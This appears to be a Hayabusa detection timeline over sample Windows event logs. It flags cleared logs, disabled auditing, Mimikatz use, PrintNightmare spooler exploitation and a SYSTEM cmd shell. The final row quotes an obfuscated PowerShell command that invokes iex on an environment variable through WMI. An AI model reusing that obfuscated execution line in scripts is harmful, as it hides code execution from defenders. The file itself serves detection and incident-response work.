admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 